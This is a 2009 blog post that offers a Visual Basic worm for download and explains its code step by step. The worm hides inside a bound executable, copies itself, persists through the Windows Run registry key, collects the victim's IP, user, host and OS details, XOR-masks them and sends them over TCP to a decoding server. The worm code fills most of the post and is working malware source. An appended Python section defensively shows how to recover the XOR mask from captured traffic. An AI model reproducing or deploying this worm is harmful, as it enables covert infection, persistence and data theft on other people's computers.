Now that Vista is on its way out and people are willing to install Seven hoping UAC is no longer there, I'm sure that Windows users will always get what they want: usability and insecurity. Many, many people make money thanks to Windows XP's insecurity: regular users saving a lot of time, and malicious users infecting the former. Great scenario, keeping the money moving.
Here is an example of this business: a computer worm. Yes, this can be used to harm computers, spread payloads, disclose information... and for educational purposes.
Risk disclaimer: (Please read very carefully)
No guarantees of the currency or accuracy of the information are made. bilbaodigital.es's information is provided "as is", without warranty of any kind, whether expressed or implied. bilbaodigital.es and its authors make no guarantee and hold no responsibility for any damage, injury, loss of property, loss of data, loss of any and all resources, or any negative influence whatsoever, that may result from any and all usage of the information found on bilbaodigital.es, or linked from bilbaodigital.es (including but not limited to bilbaodigital.es's articles). This includes but is not limited to downloadable software on bilbaodigital.es.
Negative consequences of your usage of the bilbaodigital.es website are solely your problem and your responsibility. All consequences of the usage of bilbaodigital.es do not involve bilbaodigital.es and its authors, at all, ever. You hold full responsibility for your actions.
Use bilbaodigital.es's information resources at your own risk.
Download Worm (replicates, modifies registry, encrypts and sends information) - md5 hash 5479efa37350f2c63dfd874e450fdc3f - virustotal.com results
Download Server (listens, waits for myworm.exe transmission and decrypts data) - md5 hash 6ae27d05ce325fdfb6da310b4b219c4b - virustotal.com results
15/12/2009
These five steps were considered while developing this Visual Basic worm code.
1. In a layer 8 error, a user executes the malicious file.
First step from the victim's point of view, but the last one for developers. Iexpress.exe is a Windows tool that can be used to bind/join two executables and automatically run the programs contained inside. You can distribute any exe (myworm.exe) within a well-known application (notepad.exe). Self-explanatory.
2. Once done, it replicates: it copies itself to other filesystems.
Now the code must guarantee survival by copying itself to another location with a different name/properties:
Dim nombre_archivo As String = System.IO.Path.GetFileName(Process.GetCurrentProcess().MainModule.FileName)
Dim archivo_origen As String = Process.GetCurrentProcess().MainModule.FileName
Dim archivo_destino As String = "C:\" + nombre_archivo
Private Sub copia()
If System.IO.File.Exists(archivo_destino) = False Then
System.IO.File.Copy(archivo_origen, archivo_destino)
MsgBox("File copied")
End If
End Sub
3. Runs on startup, registering itself in the OS registry.
To execute the code on computer startup we can modify the registry:
Dim key As Microsoft.Win32.RegistryKey = Microsoft.Win32.Registry.CurrentUser.OpenSubKey("Software\Microsoft\Windows\CurrentVersion\Run", True)
Private Sub registro()
If key.GetValue(nombre_archivo) = "" Then
key.SetValue(nombre_archivo, "C:\myworm.EXE")
MsgBox("Registry added")
End If
End Sub
4. Gathers information about users, computers and networks.
Now you can read any file from the computer, obtain information provided by the programming language, ...
- Public IP
Dim plaindata As String
Function whatismyip()
Dim uri As New Uri("http://www.whatismyip.org/")
Dim request As WebRequest = WebRequest.Create(uri)
Dim response As WebResponse = request.GetResponse()
Dim stream As Stream = response.GetResponseStream()
Dim reader As New StreamReader(stream)
Dim myIP As String = reader.ReadToEnd()
reader.Close()
stream.Close()
Return myIP
End Function
plaindata = ("IP Pública: " + whatismyip())
plaindata = plaindata + (" Nombre equipo/usuario: " + Environment.UserDomainName + "/" + Environment.UserName)
plaindata = plaindata + (" Información del equipo: " + Dns.GetHostName)
plaindata = plaindata + (" SO/Versión: " + My.Computer.Info.OSFullName + "/" + My.Computer.Info.OSVersion)
plaindata = plaindata + (" Idioma/Código: " + My.Computer.Info.InstalledUICulture.DisplayName + "/" + My.Computer.Info.InstalledUICulture.Name)
plaindata= plaindata + (" Hora: " + My.Computer.Clock.LocalTime)
5. Sends this information encrypted to a specific host/port using a TCP client-server architecture.
We can encrypt this information before sending it to another host with a simple XOR translation.
Function XorString(ByVal targetString As String, ByVal maskValue As String) As String
Dim Index As Integer = 0
Dim ReturnValue As String = ""
For Each CharValue As Char In targetString.ToCharArray
ReturnValue = String.Concat(ReturnValue, Chr(Asc(CharValue) Xor Asc(maskValue.Substring(Index, 1))))
Index = (Index + 1) Mod maskValue.Length
Next
Return ReturnValue
End Function
Dim encrypteddata = XorString(plaindata, "01010101")
Now this information can be transferred to a specific port using a TCP client-server architecture. Client:
Sub TCPClient()
Dim tcpClient As New System.Net.Sockets.TcpClient
Try
tcpClient.Connect("Localhost", 2009)
Catch e As Exception
Console.WriteLine(e.ToString())
Console.ReadLine()
End Try
Dim networkStream As NetworkStream = tcpClient.GetStream()
If networkStream.CanWrite And networkStream.CanRead Then
' Do a simple write.
Dim sendBytes As [Byte]() = Encoding.UTF8.GetBytes(infocrypted)
networkStream.Write(sendBytes, 0, sendBytes.Length)
' Read the NetworkStream into a byte buffer.
Dim bytes(tcpClient.ReceiveBufferSize) As Byte
networkStream.Read(bytes, 0, CInt(tcpClient.ReceiveBufferSize))
' Output the data received from the host to the console.
Dim returndata As String = Encoding.UTF8.GetString(bytes)
Console.WriteLine("El servidor TCP devuelve: " + returndata.TrimEnd(" "))
Else
If Not networkStream.CanRead Then
Console.WriteLine("Could not write data to data stream")
tcpClient.Close()
Else
If Not networkStream.CanWrite Then
Console.WriteLine("Could not read data from data stream")
tcpClient.Close()
End If
End If
End If
' Pause to let the user view the console output.
Console.ReadLine()
End Sub
Multithread server:
'DnsPermissionAttribute specifies permission to request information from Domain Name Servers.
Class CTestTCPServer
Shared Sub Main()
Const portNumber As Integer = 2009
Dim tcpListener As New TcpListener(portNumber)
tcpListener.Start()
Console.WriteLine("Esperando conexiones de clientes TCP...")
While (True)
Try
'Accept the pending client connection and return a TcpClient for communication.
Dim tcpClient As TcpClient = tcpListener.AcceptTcpClient()
Console.WriteLine("Conexión aceptada.-------------------")
' Get the data stream.
Dim networkStream As NetworkStream = tcpClient.GetStream()
' Read the data stream into a byte array.
Dim bytes(tcpClient.ReceiveBufferSize) As Byte
networkStream.Read(bytes, 0, CInt(tcpClient.ReceiveBufferSize))
' Return the data received from the client to the console.
Dim clientdata As String = Encoding.UTF8.GetString(bytes)
Dim clientdataplain As String = XorString(clientdata, "01010101")
Console.WriteLine("El cliente ha enviado: " + clientdataplain.TrimEnd("1", "0"))
Dim responseString As String = "Correctamente conectado al servidor TCP."
Dim sendBytes As [Byte]() = Encoding.UTF8.GetBytes(responseString)
networkStream.Write(sendBytes, 0, sendBytes.Length)
Console.WriteLine(("Mensaje enviado por el servidor TCP: " + responseString))
'Close TcpClient.
tcpClient.Close()
Catch e As Exception
Console.WriteLine(e.ToString())
Console.ReadLine()
End Try
End While
End Sub
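The XOR step above (mask "01010101") and the server that undoes it show why this is obfuscation rather than encryption: the mask repeats, and every report starts with the same fixed label, so anyone who captures the client's TCP payload can recover the mask from that known prefix and read the exfiltrated data. Added example in Python, not part of the original post or the worm's code; ord()/chr() stand in for VB's Asc/Chr (assuming a Latin-1 code page) and the captured bytes are a constructed sample.

```python
# Added example (not from the original post): recover the repeating XOR mask
# of the worm's "encryption" from a captured exfil message, using only the
# fixed "IP Pública: " label that every report starts with.

KNOWN_PREFIX = "IP Pública: "   # first label the worm writes into plaindata


def xor_string(text: str, mask: str) -> str:
    """Python mirror of the post's XorString: char-wise XOR with a repeating
    mask. ord()/chr() stand in for VB's Asc/Chr (assumes a Latin-1 code page)."""
    return "".join(chr(ord(c) ^ ord(mask[i % len(mask)]))
                   for i, c in enumerate(text))


def recover_mask(ciphertext: str, known_plaintext: str) -> str:
    """XOR the captured text with the known plaintext to expose the mask
    stream, then return its shortest repeating period. Caveat: the known
    plaintext must be at least as long as the true mask period, otherwise
    the period found here is a coincidence and decoding yields garbage."""
    if len(ciphertext) < len(known_plaintext):
        raise ValueError("capture is shorter than the known plaintext")
    stream = xor_string(ciphertext[:len(known_plaintext)], known_plaintext)
    for period in range(1, len(stream) + 1):
        if all(stream[i] == stream[i % period] for i in range(len(stream))):
            return stream[:period]
    return stream  # period == len(stream) always matches, so never reached


def decode_capture(raw: bytes, known_prefix: str = KNOWN_PREFIX):
    """Decode a captured TCP payload (UTF-8, like the client's Encoding.UTF8)
    and return (recovered mask, recovered plaintext report)."""
    ciphertext = raw.decode("utf-8")
    mask = recover_mask(ciphertext, known_prefix)
    return mask, xor_string(ciphertext, mask)


# Constructed sample: what the worm would build as plaindata for one victim.
SAMPLE_PLAINTEXT = ("IP Pública: 203.0.113.7 Nombre equipo/usuario: LAB/alice"
                    " Información del equipo: LAB-PC SO/Versión: Microsoft"
                    " Windows XP/5.1.2600 Hora: 15/12/2009 10:00:00")
# Constructed capture: the bytes the client puts on the wire (mask "01010101").
SAMPLE_CAPTURE = xor_string(SAMPLE_PLAINTEXT, "01010101").encode("utf-8")

if __name__ == "__main__":
    mask, report = decode_capture(SAMPLE_CAPTURE)
    print(f"recovered mask: {mask!r} (the post's 8-char mask is this repeated)")
    print(report)
```

The recovered mask is "01" rather than "01010101" because the post's mask has an effective period of 2; both decode the capture identically.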